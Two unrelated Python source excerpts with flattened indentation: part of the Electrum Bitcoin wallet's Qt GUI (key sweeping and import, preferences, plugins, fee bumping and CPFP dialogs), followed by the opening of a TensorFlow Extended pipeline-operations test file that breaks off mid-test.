for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
#traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
pipeline_ops_test.py
|
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.orchestration.experimental.core.pipeline_ops."""
import copy
import os
import threading
import time
from absl.testing import parameterized
from absl.testing.absltest import mock
import tensorflow as tf
from tfx.dsl.compiler import constants
from tfx.orchestration import metadata
from tfx.orchestration.experimental.core import async_pipeline_task_gen
from tfx.orchestration.experimental.core import mlmd_state
from tfx.orchestration.experimental.core import pipeline_ops
from tfx.orchestration.experimental.core import pipeline_state as pstate
from tfx.orchestration.experimental.core import service_jobs
from tfx.orchestration.experimental.core import sync_pipeline_task_gen
from tfx.orchestration.experimental.core import task as task_lib
from tfx.orchestration.experimental.core import task_gen_utils
from tfx.orchestration.experimental.core import task_queue as tq
from tfx.orchestration.experimental.core import test_utils
from tfx.orchestration.experimental.core.task_schedulers import manual_task_scheduler
from tfx.orchestration.experimental.core.testing import test_async_pipeline
from tfx.orchestration.experimental.core.testing import test_manual_node
from tfx.orchestration.portable import execution_publish_utils
from tfx.orchestration.portable import runtime_parameter_utils
from tfx.orchestration.portable.mlmd import context_lib
from tfx.orchestration.portable.mlmd import execution_lib
from tfx.proto.orchestration import pipeline_pb2
from tfx.utils import status as status_lib
from ml_metadata.proto import metadata_store_pb2
def _test_pipeline(pipeline_id,
execution_mode: pipeline_pb2.Pipeline.ExecutionMode = (
pipeline_pb2.Pipeline.ASYNC)):
pipeline = pipeline_pb2.Pipeline()
pipeline.pipeline_info.id = pipeline_id
pipeline.execution_mode = execution_mode
if execution_mode == pipeline_pb2.Pipeline.SYNC:
pipeline.runtime_spec.pipeline_run_id.field_value.string_value = 'run0'
return pipeline
class PipelineOpsTest(test_utils.TfxTest, parameterized.TestCase):
def setUp(self):
super().setUp()
pipeline_root = os.path.join(
os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),
self.id())
# Makes sure multiple connections within a test always connect to the same
# MLMD instance.
metadata_path = os.path.join(pipeline_root, 'metadata', 'metadata.db')
self._metadata_path = metadata_path
connection_config = metadata.sqlite_metadata_connection_config(
metadata_path)
connection_config.sqlite.SetInParent()
self._mlmd_connection = metadata.Metadata(
connection_config=connection_config)
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_initiate_pipeline_start(self, pipeline):
with self._mlmd_connection as m:
# Initiate a pipeline start.
with pipeline_ops.initiate_pipeline_start(m, pipeline) as pipeline_state1:
self.assertProtoPartiallyEquals(
pipeline, pipeline_state1.pipeline, ignored_fields=['runtime_spec'])
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state1.get_pipeline_execution_state())
# Initiate another pipeline start.
pipeline2 = _test_pipeline('pipeline2')
with pipeline_ops.initiate_pipeline_start(m,
pipeline2) as pipeline_state2:
self.assertEqual(pipeline2, pipeline_state2.pipeline)
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state2.get_pipeline_execution_state())
# Error if attempted to initiate when old one is active.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.initiate_pipeline_start(m, pipeline)
self.assertEqual(status_lib.Code.ALREADY_EXISTS,
exception_context.exception.code)
# Fine to initiate after the previous one is inactive.
with pipeline_state1:
pipeline_state1.set_pipeline_execution_state(
metadata_store_pb2.Execution.COMPLETE)
with pipeline_ops.initiate_pipeline_start(m, pipeline) as pipeline_state3:
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state3.get_pipeline_execution_state())
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_non_existent_or_inactive(self, pipeline):
with self._mlmd_connection as m:
# Stop pipeline without creating one.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(m,
task_lib.PipelineUid.from_pipeline(pipeline))
self.assertEqual(status_lib.Code.NOT_FOUND,
exception_context.exception.code)
# Initiate pipeline start and mark it completed.
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
pipeline_state.initiate_stop(status_lib.Status(code=status_lib.Code.OK))
pipeline_state.set_pipeline_execution_state(
metadata_store_pb2.Execution.COMPLETE)
# Try to initiate stop again.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(m, pipeline_uid)
self.assertEqual(status_lib.Code.NOT_FOUND,
exception_context.exception.code)
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
